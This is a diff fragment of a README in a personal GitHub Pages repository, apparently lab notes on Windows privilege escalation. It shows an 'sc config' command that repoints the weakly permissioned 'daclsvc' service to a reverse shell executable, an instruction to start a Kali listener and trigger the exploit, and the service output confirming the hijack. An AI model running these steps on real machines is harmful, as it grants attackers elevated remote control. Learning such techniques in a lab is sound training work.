dayaramb/dayaramb.github.io/README.md

 Reconfigure the service to use our reverse shell executable: sc config daclsvc binpath= "\"c:\Privesc\rev.exe\""

-Start a listener on Kali, and then start the service to trigger the
+Start a listener on Kali, and then start the service to trigger the exploit:
-exploit:
 QueryServiceConfig SUCCESS

 SERVICE_NAME: daclsvc
         TYPE               : 10  WIN32_OWN_PROCESS
-        START_TYPE         : 3   DEMAND_START
-        ERROR_CONTROL      : 1   NORMAL

         BINARY_PATH_NAME   : "c:\Privesc\rev.exe"
         LOAD_ORDER_GROUP   :
         TAG                : 0